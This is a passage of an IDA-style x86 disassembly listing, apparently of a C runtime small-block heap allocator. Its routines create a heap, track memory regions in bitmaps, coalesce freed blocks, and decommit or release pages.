add esp, 4
mov eax, [ebp+arg_0]
push eax
call sub_41CB40
add esp, 4
mov [ebp+var_4], eax
cmp [ebp+var_4], 0
jz short loc_41C907
mov ecx, [ebp+arg_0]
push ecx
mov edx, [ebp+var_4]
push edx
call sub_41CC00
add esp, 8
push 9
call sub_41BD30
add esp, 4
jmp short loc_41C924
; ---------------------------------------------------------------------------
loc_41C907: ; CODE XREF: sub_41C8C0+29�j
push 9
call sub_41BD30
add esp, 4
mov eax, [ebp+arg_0]
push eax
push 0
mov ecx, dword_49377C
push ecx
call ds:dword_494350
loc_41C924: ; CODE XREF: sub_41C8C0+A�j
; sub_41C8C0+45�j
mov esp, ebp
pop ebp
retn
sub_41C8C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C930 proc near ; CODE XREF: sub_417BD0+30�p
; .text:0041C9B3�p
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
mov [ebp+var_4], 0FFFFFFFEh
push 9
call sub_41BC90
add esp, 4
call sub_41E130
test eax, eax
jge short loc_41C955
mov [ebp+var_4], 0FFFFFFFCh
loc_41C955: ; CODE XREF: sub_41C930+1C�j
push 9
call sub_41BD30
add esp, 4
push 0
push 0
mov eax, dword_49377C
push eax
call ds:dword_494410
test eax, eax
jnz short loc_41C99D
call ds:dword_4942F0
cmp eax, 78h
jnz short loc_41C996
call sub_422F30
mov dword ptr [eax], 78h
call sub_422F20
mov dword ptr [eax], 28h
jmp short loc_41C99D
; ---------------------------------------------------------------------------
loc_41C996: ; CODE XREF: sub_41C930+4C�j
mov [ebp+var_4], 0FFFFFFFCh
loc_41C99D: ; CODE XREF: sub_41C930+41�j
; sub_41C930+64�j
mov eax, [ebp+var_4]
mov esp, ebp
pop ebp
retn
sub_41C930 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
call sub_41C930
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C9C0 proc near ; CODE XREF: sub_41B970+7E�p
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push 0
push 1000h
xor eax, eax
cmp [ebp+arg_0], 0
setz al
push eax
call ds:dword_49444C
mov dword_49377C, eax
cmp dword_49377C, 0
jnz short loc_41C9EC
xor eax, eax
jmp short loc_41CA0B
; ---------------------------------------------------------------------------
loc_41C9EC: ; CODE XREF: sub_41C9C0+26�j
call sub_41CAE0
test eax, eax
jnz short loc_41CA06
mov ecx, dword_49377C
push ecx
call ds:dword_494448
xor eax, eax
jmp short loc_41CA0B
; ---------------------------------------------------------------------------
loc_41CA06: ; CODE XREF: sub_41C9C0+33�j
mov eax, 1
loc_41CA0B: ; CODE XREF: sub_41C9C0+2A�j
; sub_41C9C0+44�j
pop ebp
retn
sub_41C9C0 endp
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, dword_493778
mov [ebp-8], eax
mov dword ptr [ebp-4], 0
jmp short loc_41CA30
; ---------------------------------------------------------------------------
loc_41CA27: ; CODE XREF: .text:0041CA84�j
mov ecx, [ebp-4]
add ecx, 1
mov [ebp-4], ecx
loc_41CA30: ; CODE XREF: .text:0041CA25�j
mov edx, [ebp-4]
cmp edx, dword_493774
jge short loc_41CA86
push 4000h
push 100000h
mov eax, [ebp-8]
mov ecx, [eax+0Ch]
push ecx
call ds:dword_494450
push 8000h
push 0
mov edx, [ebp-8]
mov eax, [edx+0Ch]
push eax
call ds:dword_494450
mov ecx, [ebp-8]
mov edx, [ecx+10h]
push edx
push 0
mov eax, dword_49377C
push eax
call ds:dword_494350
mov ecx, [ebp-8]
add ecx, 14h
mov [ebp-8], ecx
jmp short loc_41CA27
; ---------------------------------------------------------------------------
loc_41CA86: ; CODE XREF: .text:0041CA39�j
mov edx, dword_493778
push edx
push 0
mov eax, dword_49377C
push eax
call ds:dword_494350
mov ecx, dword_49377C
push ecx
call ds:dword_494448
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
mov eax, dword_442D48
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
push ebp
mov ebp, esp
cmp dword ptr [ebp+8], 3F8h
jbe short loc_41CAD0
xor eax, eax
jmp short loc_41CADD
; ---------------------------------------------------------------------------
loc_41CAD0: ; CODE XREF: .text:0041CACA�j
mov eax, [ebp+8]
mov dword_442D48, eax
mov eax, 1
loc_41CADD: ; CODE XREF: .text:0041CACE�j
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CAE0 proc near ; CODE XREF: sub_41C9C0:loc_41C9EC�p
push ebp
mov ebp, esp
push 140h
push 0
mov eax, dword_49377C
push eax
call ds:dword_494354
mov dword_493778, eax
cmp dword_493778, 0
jnz short loc_41CB08
xor eax, eax
jmp short loc_41CB37
; ---------------------------------------------------------------------------
loc_41CB08: ; CODE XREF: sub_41CAE0+22�j
mov ecx, dword_493778
mov dword_49376C, ecx
mov dword_493770, 0
mov dword_493774, 0
mov dword_493764, 10h
mov eax, 1
loc_41CB37: ; CODE XREF: sub_41CAE0+26�j
pop ebp
retn
sub_41CAE0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CB40 proc near ; CODE XREF: sub_418030+30�p
; sub_41C620+21�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, dword_493774
imul eax, 14h
mov ecx, dword_493778
add ecx, eax
mov [ebp+var_C], ecx
mov edx, dword_493778
mov [ebp+var_8], edx
loc_41CB62: ; CODE XREF: sub_41CB40+4D�j
mov eax, [ebp+var_8]
cmp eax, [ebp+var_C]
jnb short loc_41CB8F
mov ecx, [ebp+var_8]
mov edx, [ebp+arg_0]
sub edx, [ecx+0Ch]
mov [ebp+var_4], edx
cmp [ebp+var_4], 100000h
jnb short loc_41CB84
mov eax, [ebp+var_8]
jmp short loc_41CB91
; ---------------------------------------------------------------------------
loc_41CB84: ; CODE XREF: sub_41CB40+3D�j
mov eax, [ebp+var_8]
add eax, 14h
mov [ebp+var_8], eax
jmp short loc_41CB62
; ---------------------------------------------------------------------------
loc_41CB8F: ; CODE XREF: sub_41CB40+28�j
xor eax, eax
loc_41CB91: ; CODE XREF: sub_41CB40+42�j
mov esp, ebp
pop ebp
retn
sub_41CB40 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CBA0 proc near ; CODE XREF: sub_418030+4C�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
mov eax, [ebp+arg_0]
mov ecx, [ebp+arg_4]
sub ecx, [eax+0Ch]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
shr edx, 0Fh
mov [ebp+var_4], edx
mov eax, 80000000h
mov ecx, [ebp+var_4]
shr eax, cl
mov ecx, [ebp+arg_0]
mov edx, [ecx+8]
and edx, eax
test edx, edx
jnz short loc_41CBF1
mov eax, [ebp+var_8]
and eax, 0Fh
test eax, eax
jnz short loc_41CBF1
mov ecx, [ebp+var_8]
and ecx, 0FFFh
test ecx, ecx
jz short loc_41CBF1
mov [ebp+var_C], 1
jmp short loc_41CBF8
; ---------------------------------------------------------------------------
loc_41CBF1: ; CODE XREF: sub_41CBA0+2F�j
; sub_41CBA0+39�j ...
mov [ebp+var_C], 0
loc_41CBF8: ; CODE XREF: sub_41CBA0+4F�j
mov eax, [ebp+var_C]
mov esp, ebp
pop ebp
retn
sub_41CBA0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41CC00 proc near ; CODE XREF: sub_41C6D0+E8�p
; sub_41C6D0+168�p ...
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 3Ch
mov eax, [ebp+arg_0]
mov ecx, [eax+10h]
mov [ebp+var_3C], ecx
mov edx, [ebp+arg_0]
mov eax, [ebp+arg_4]
sub eax, [edx+0Ch]
mov [ebp+var_10], eax
mov ecx, [ebp+var_10]
shr ecx, 0Fh
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
imul edx, 204h
mov eax, [ebp+var_3C]
lea ecx, [eax+edx+144h]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
sub edx, 4
mov [ebp+var_1C], edx
mov eax, [ebp+var_1C]
mov ecx, [eax]
sub ecx, 1
mov [ebp+var_30], ecx
mov edx, [ebp+var_1C]
add edx, [ebp+var_30]
mov [ebp+var_38], edx
mov eax, [ebp+var_38]
mov ecx, [eax]
mov [ebp+var_14], ecx
mov edx, [ebp+var_1C]
mov eax, [edx-4]
mov [ebp+var_C], eax
mov ecx, [ebp+var_14]
and ecx, 1
test ecx, ecx
jnz loc_41CD98
mov edx, [ebp+var_14]
sar edx, 4
sub edx, 1
mov [ebp+var_24], edx
cmp [ebp+var_24], 3Fh
jbe short loc_41CC8F
mov [ebp+var_24], 3Fh
loc_41CC8F: ; CODE XREF: sub_41CC00+86�j
mov eax, [ebp+var_38]
mov ecx, [ebp+var_38]
mov edx, [eax+4]
cmp edx, [ecx+8]
jnz loc_41CD71
cmp [ebp+var_24], 20h
jnb short loc_41CD06
mov eax, 80000000h
mov ecx, [ebp+var_24]
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+44h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+44h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_24]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_41CD04
mov eax, 80000000h
mov ecx, [ebp+var_24]
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax], edx
loc_41CD04: ; CODE XREF: sub_41CC00+EA�j
jmp short loc_41CD71
; ---------------------------------------------------------------------------
loc_41CD06: ; CODE XREF: sub_41CC00+A5�j
mov ecx, [ebp+var_24]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+0C4h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+0C4h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_24]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_24]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_41CD71
mov ecx, [ebp+var_24]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_41CD71: ; CODE XREF: sub_41CC00+9B�j
; sub_41CC00:loc_41CD04�j ...
mov eax, [ebp+var_38]
mov ecx, [eax+8]
mov edx, [ebp+var_38]
mov eax, [edx+4]
mov [ecx+4], eax
mov ecx, [ebp+var_38]
mov edx, [ecx+4]
mov eax, [ebp+var_38]
mov ecx, [eax+8]
mov [edx+8], ecx
mov edx, [ebp+var_30]
add edx, [ebp+var_14]
mov [ebp+var_30], edx
loc_41CD98: ; CODE XREF: sub_41CC00+70�j
mov eax, [ebp+var_30]
sar eax, 4
sub eax, 1
mov [ebp+var_28], eax
cmp [ebp+var_28], 3Fh
jbe short loc_41CDB1
mov [ebp+var_28], 3Fh
loc_41CDB1: ; CODE XREF: sub_41CC00+1A8�j
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jnz loc_41CF15
mov edx, [ebp+var_1C]
sub edx, [ebp+var_C]
mov [ebp+var_34], edx
mov eax, [ebp+var_C]
sar eax, 4
sub eax, 1
mov [ebp+var_2C], eax
cmp [ebp+var_2C], 3Fh
jbe short loc_41CDE1
mov [ebp+var_2C], 3Fh
loc_41CDE1: ; CODE XREF: sub_41CC00+1D8�j
mov ecx, [ebp+var_30]
add ecx, [ebp+var_C]
mov [ebp+var_30], ecx
mov edx, [ebp+var_30]
sar edx, 4
sub edx, 1
mov [ebp+var_28], edx
cmp [ebp+var_28], 3Fh
jbe short loc_41CE03
mov [ebp+var_28], 3Fh
loc_41CE03: ; CODE XREF: sub_41CC00+1FA�j
mov eax, [ebp+var_2C]
cmp eax, [ebp+var_28]
jz loc_41CF0F
mov ecx, [ebp+var_34]
mov edx, [ebp+var_34]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_41CEF1
cmp [ebp+var_2C], 20h
jnb short loc_41CE86
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+var_4]
mov ecx, [ebp+var_3C]
mov eax, [ecx+eax*4+44h]
and eax, edx
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov [edx+ecx*4+44h], eax
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov cl, [eax+4]
sub cl, 1
mov edx, [ebp+var_3C]
add edx, [ebp+var_2C]
mov [edx+4], cl
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
movsx ecx, byte ptr [eax+4]
test ecx, ecx
jnz short loc_41CE84
mov edx, 80000000h
mov ecx, [ebp+var_2C]
shr edx, cl
not edx
mov eax, [ebp+arg_0]
mov ecx, [eax]
and ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_41CE84: ; CODE XREF: sub_41CC00+26A�j
jmp short loc_41CEF1
; ---------------------------------------------------------------------------
loc_41CE86: ; CODE XREF: sub_41CC00+225�j
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
and ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
mov dl, [ecx+4]
sub dl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_2C]
mov [eax+4], dl
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_2C]
movsx edx, byte ptr [ecx+4]
test edx, edx
jnz short loc_41CEF1
mov ecx, [ebp+var_2C]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
not eax
mov ecx, [ebp+arg_0]
mov edx, [ecx+4]
and edx, eax
mov eax, [ebp+arg_0]
mov [eax+4], edx
loc_41CEF1: ; CODE XREF: sub_41CC00+21B�j
; sub_41CC00:loc_41CE84�j ...
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov eax, [ebp+var_34]
mov ecx, [eax+4]
mov [edx+4], ecx
mov edx, [ebp+var_34]
mov eax, [edx+4]
mov ecx, [ebp+var_34]
mov edx, [ecx+8]
mov [eax+8], edx
loc_41CF0F: ; CODE XREF: sub_41CC00+209�j
mov eax, [ebp+var_34]
mov [ebp+var_1C], eax
loc_41CF15: ; CODE XREF: sub_41CC00+1B9�j
mov ecx, [ebp+var_C]
and ecx, 1
test ecx, ecx
jnz short loc_41CF2B
mov edx, [ebp+var_2C]
cmp edx, [ebp+var_28]
jz loc_41D03B
loc_41CF2B: ; CODE XREF: sub_41CC00+31D�j
mov eax, [ebp+var_28]
mov ecx, [ebp+var_8]
lea edx, [ecx+eax*8]
mov [ebp+var_20], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov edx, [ecx+4]
mov [eax+4], edx
mov eax, [ebp+var_1C]
mov ecx, [ebp+var_20]
mov [eax+8], ecx
mov edx, [ebp+var_20]
mov eax, [ebp+var_1C]
mov [edx+4], eax
mov ecx, [ebp+var_1C]
mov edx, [ecx+4]
mov eax, [ebp+var_1C]
mov [edx+8], eax
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_1C]
mov eax, [ecx+4]
cmp eax, [edx+8]
jnz loc_41D03B
cmp [ebp+var_28], 20h
jnb short loc_41CFD4
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_41CFB2
mov edx, 80000000h
mov ecx, [ebp+var_28]
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx], ecx
loc_41CFB2: ; CODE XREF: sub_41CC00+39A�j
mov eax, 80000000h
mov ecx, [ebp+var_28]
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+44h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+44h], ecx
jmp short loc_41D03B
; ---------------------------------------------------------------------------
loc_41CFD4: ; CODE XREF: sub_41CC00+377�j
mov ecx, [ebp+var_3C]
add ecx, [ebp+var_28]
movsx edx, byte ptr [ecx+4]
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov cl, [eax+4]
add cl, 1
mov eax, [ebp+var_3C]
add eax, [ebp+var_28]
mov [eax+4], cl
test edx, edx
jnz short loc_41D012
mov ecx, [ebp+var_28]
sub ecx, 20h
mov edx, 80000000h
shr edx, cl
mov eax, [ebp+arg_0]
mov ecx, [eax+4]
or ecx, edx
mov edx, [ebp+arg_0]
mov [edx+4], ecx
loc_41D012: ; CODE XREF: sub_41CC00+3F5�j
mov ecx, [ebp+var_28]
sub ecx, 20h
mov eax, 80000000h
shr eax, cl
mov ecx, [ebp+var_4]
mov edx, [ebp+var_3C]
mov ecx, [edx+ecx*4+0C4h]
or ecx, eax
mov edx, [ebp+var_4]
mov eax, [ebp+var_3C]
mov [eax+edx*4+0C4h], ecx
loc_41D03B: ; CODE XREF: sub_41CC00+325�j
; sub_41CC00+36D�j ...
mov ecx, [ebp+var_1C]
mov edx, [ebp+var_30]
mov [ecx], edx
mov eax, [ebp+var_1C]
add eax, [ebp+var_30]
mov ecx, [ebp+var_30]
mov [eax-4], ecx
mov edx, [ebp+var_8]
mov eax, [edx]
sub eax, 1
mov ecx, [ebp+var_8]
mov [ecx], eax
mov edx, [ebp+var_8]
cmp dword ptr [edx], 0
jnz loc_41D1C9
cmp dword_493770, 0
jz loc_41D1B8
mov eax, dword_493768
shl eax, 0Fh
mov ecx, dword_493770
mov edx, [ecx+0Ch]
add edx, eax
mov [ebp+var_18], edx
push 4000h
push 8000h
mov eax, [ebp+var_18]
push eax
call ds:dword_494450
mov edx, 80000000h
mov ecx, dword_493768
shr edx, cl
mov eax, dword_493770
mov ecx, [eax+8]
or ecx, edx
mov edx, dword_493770
mov [edx+8], ecx
mov eax, dword_493770
mov ecx, [eax+10h]
mov edx, dword_493768
mov dword ptr [ecx+edx*4+0C4h], 0
mov eax, dword_493770
mov ecx, [eax+10h]
mov dl, [ecx+43h]
sub dl, 1
mov eax, dword_493770
mov ecx, [eax+10h]
mov [ecx+43h], dl
mov edx, dword_493770
mov eax, [edx+10h]
movsx ecx, byte ptr [eax+43h]
test ecx, ecx
jnz short loc_41D116
mov edx, dword_493770
mov eax, [edx+4]
and al, 0FEh
mov ecx, dword_493770
mov [ecx+4], eax
loc_41D116: ; CODE XREF: sub_41CC00+500�j
mov edx, dword_493770
cmp dword ptr [edx+8], 0FFFFFFFFh
jnz loc_41D1B8
push 8000h
push 0
mov eax, dword_493770
mov ecx, [eax+0Ch]
push ecx
call ds:dword_494450
mov edx, dword_493770
mov eax, [edx+10h]
push eax
push 0
mov ecx, dword_49377C
push ecx
call ds:dword_494350
mov edx, dword_493774
imul edx, 14h
mov eax, dword_493778
add eax, edx
mov ecx, dword_493770
add ecx, 14h
sub eax, ecx
push eax
mov edx, dword_493770
add edx, 14h
push edx
mov eax, dword_493770
push eax
call sub_426C00
add esp, 0Ch
mov ecx, dword_493774
sub ecx, 1
mov dword_493774, ecx
mov edx, [ebp+arg_0]
cmp edx, dword_493770
jbe short loc_41D1AC
mov eax, [ebp+arg_0]
sub eax, 14h
mov [ebp+arg_0], eax
loc_41D1AC: ; CODE XREF: sub_41CC00+5A1�j
mov ecx, dword_493778
mov dword_49376C, ecx
loc_41D1B8: ; CODE XREF: sub_41CC00+46F�j
; sub_41CC00+520�j
mov edx, [ebp+arg_0]
mov dword_493770, edx
mov eax, [ebp+var_4]
mov dword_493768, eax
loc_41D1C9: ; CODE XREF: sub_41CC00+462�j
mov esp, ebp
pop ebp
retn
sub_41CC00 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41D1D0 proc near ; CODE XREF: sub_41BDF0+1D�p
; sub_41C6D0+99�p
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 38h
push esi
mov eax, dword_493774
imul eax, 14h
mov ecx, dword_493778
add ecx, eax
mov [ebp+var_2C], ecx
mov edx, [ebp+arg_0]
add edx, 17h
and edx, 0FFFFFFF0h
mov [ebp+var_28], edx
mov eax, [ebp+var_28]
sar eax, 4
sub eax, 1
mov [ebp+var_20], eax
cmp [ebp+var_20], 20h
jge short loc_41D21C
or edx, 0FFFFFFFFh
mov ecx, [ebp+var_20]
shr edx, cl
mov [ebp+var_24], edx
mov [ebp+var_34], 0FFFFFFFFh
jmp short loc_41D231
; ---------------------------------------------------------------------------
loc_41D21C: ; CODE XREF: sub_41D1D0+36�j
mov [ebp+var_24], 0
mov ecx, [ebp+var_20]
sub ecx, 20h
or eax, 0FFFFFFFFh
shr eax, cl
mov [ebp+var_34], eax
loc_41D231: ; CODE XREF: sub_41D1D0+4A�j
mov ecx, dword_49376C
mov [ebp+var_18], ecx
loc_41D23A: ; CODE XREF: sub_41D1D0+94�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnb short loc_41D266
mov eax, [ebp+var_18]
mov ecx, [ebp+var_24]
and ecx, [eax]
mov edx, [ebp+var_18]
mov eax, [ebp+var_34]
and eax, [edx+4]
or ecx, eax
test ecx, ecx
jz short loc_41D25B
jmp short loc_41D266
; ---------------------------------------------------------------------------
loc_41D25B: ; CODE XREF: sub_41D1D0+87�j
mov ecx, [ebp+var_18]
add ecx, 14h
mov [ebp+var_18], ecx
jmp short loc_41D23A
; ---------------------------------------------------------------------------
loc_41D266: ; CODE XREF: sub_41D1D0+70�j
; sub_41D1D0+89�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnz loc_41D34D
mov eax, dword_493778
mov [ebp+var_18], eax
loc_41D27A: ; CODE XREF: sub_41D1D0+D7�j
mov ecx, [ebp+var_18]
cmp ecx, dword_49376C
jnb short loc_41D2A9
mov edx, [ebp+var_18]
mov eax, [ebp+var_24]
and eax, [edx]
mov ecx, [ebp+var_18]
mov edx, [ebp+var_34]
and edx, [ecx+4]
or eax, edx
test eax, eax
jz short loc_41D29E
jmp short loc_41D2A9
; ---------------------------------------------------------------------------
loc_41D29E: ; CODE XREF: sub_41D1D0+CA�j
mov eax, [ebp+var_18]
add eax, 14h
mov [ebp+var_18], eax
jmp short loc_41D27A
; ---------------------------------------------------------------------------
loc_41D2A9: ; CODE XREF: sub_41D1D0+B3�j
; sub_41D1D0+CC�j
mov ecx, [ebp+var_18]
cmp ecx, dword_49376C
jnz loc_41D34D
loc_41D2B8: ; CODE XREF: sub_41D1D0+104�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnb short loc_41D2D6
mov eax, [ebp+var_18]
cmp dword ptr [eax+8], 0
jz short loc_41D2CB
jmp short loc_41D2D6
; ---------------------------------------------------------------------------
loc_41D2CB: ; CODE XREF: sub_41D1D0+F7�j
mov ecx, [ebp+var_18]
add ecx, 14h
mov [ebp+var_18], ecx
jmp short loc_41D2B8
; ---------------------------------------------------------------------------
loc_41D2D6: ; CODE XREF: sub_41D1D0+EE�j
; sub_41D1D0+F9�j
mov edx, [ebp+var_18]
cmp edx, [ebp+var_2C]
jnz short loc_41D327
mov eax, dword_493778
mov [ebp+var_18], eax
loc_41D2E6: ; CODE XREF: sub_41D1D0+135�j
mov ecx, [ebp+var_18]
cmp ecx, dword_49376C
jnb short loc_41D307
mov edx, [ebp+var_18]
cmp dword ptr [edx+8], 0
jz short loc_41D2FC
jmp short loc_41D307
; ---------------------------------------------------------------------------
loc_41D2FC: ; CODE XREF: sub_41D1D0+128�j
mov eax, [ebp+var_18]
add eax, 14h
mov [ebp+var_18], eax
jmp short loc_41D2E6
; ---------------------------------------------------------------------------
loc_41D307: ; CODE XREF: sub_41D1D0+11F�j
; sub_41D1D0+12A�j
mov ecx, [ebp+var_18]
cmp ecx, dword_49376C
jnz short loc_41D327
call sub_41D710
mov [ebp+var_18], eax
cmp [ebp+var_18], 0
jnz short loc_41D327
xor eax, eax
jmp loc_41D701
; ---------------------------------------------------------------------------
loc_41D327: ; CODE XREF: sub_41D1D0+10C�j
; sub_41D1D0+140�j ...
mov edx, [ebp+var_18]
push edx
call sub_41D820
add esp, 4
mov ecx, [ebp+var_18]
mov edx, [ecx+10h]
mov [edx], eax
mov eax, [ebp+var_18]
mov ecx, [eax+10h]
cmp dword ptr [ecx], 0FFFFFFFFh
jnz short loc_41D34D
xor eax, eax
jmp loc_41D701
; ---------------------------------------------------------------------------
loc_41D34D: ; CODE XREF: sub_41D1D0+9C�j
; sub_41D1D0+E2�j ...
mov edx, [ebp+var_18]
mov dword_49376C, edx
mov eax, [ebp+var_18]
mov ecx, [eax+10h]
mov [ebp+var_38], ecx
mov edx, [ebp+var_38]
mov eax, [edx]
mov [ebp+var_30], eax
cmp [ebp+var_30], 0FFFFFFFFh
jz short loc_41D390
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov eax, [ebp+var_24]
and eax, [edx+ecx*4+44h]
mov ecx, [ebp+var_30]
mov edx, [ebp+var_38]
mov esi, [ebp+var_34]
and esi, [edx+ecx*4+0C4h]
or eax, esi
test eax, eax
jnz short loc_41D3C5
loc_41D390: ; CODE XREF: sub_41D1D0+19B�j
mov [ebp+var_30], 0
loc_41D397: ; CODE XREF: sub_41D1D0+1F3�j
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_24]
and edx, [ecx+eax*4+44h]
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov esi, [ebp+var_34]
and esi, [ecx+eax*4+0C4h]
or edx, esi
test edx, edx
jnz short loc_41D3C5
mov edx, [ebp+var_30]
add edx, 1
mov [ebp+var_30], edx
jmp short loc_41D397
; ---------------------------------------------------------------------------
loc_41D3C5: ; CODE XREF: sub_41D1D0+1BE�j
; sub_41D1D0+1E8�j
mov eax, [ebp+var_30]
imul eax, 204h
mov ecx, [ebp+var_38]
lea edx, [ecx+eax+144h]
mov [ebp+var_4], edx
mov [ebp+var_20], 0
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_24]
and edx, [ecx+eax*4+44h]
mov [ebp+var_1C], edx
cmp [ebp+var_1C], 0
jnz short loc_41D412
mov [ebp+var_20], 20h
mov eax, [ebp+var_30]
mov ecx, [ebp+var_38]
mov edx, [ebp+var_34]
and edx, [ecx+eax*4+0C4h]
mov [ebp+var_1C], edx
loc_41D412: ; CODE XREF: sub_41D1D0+226�j
; sub_41D1D0+259�j
cmp [ebp+var_1C], 0
jl short loc_41D42B
mov eax, [ebp+var_1C]
shl eax, 1
mov [ebp+var_1C], eax
mov ecx, [ebp+var_20]
add ecx, 1
mov [ebp+var_20], ecx
jmp short loc_41D412
; ---------------------------------------------------------------------------
loc_41D42B: ; CODE XREF: sub_41D1D0+246�j
mov edx, [ebp+var_20]
mov eax, [ebp+var_4]
mov ecx, [eax+edx*8+4]
mov [ebp+var_10], ecx
mov edx, [ebp+var_10]
mov eax, [edx]
sub eax, [ebp+var_28]
mov [ebp+var_8], eax
mov ecx, [ebp+var_8]
sar ecx, 4
sub ecx, 1
mov [ebp+var_14], ecx
cmp [ebp+var_14], 3Fh
jle short loc_41D45C
mov [ebp+var_14], 3Fh
loc_41D45C: ; CODE XREF: sub_41D1D0+283�j
mov edx, [ebp+var_14]
cmp edx, [ebp+var_20]
jz loc_41D680
mov eax, [ebp+var_10]
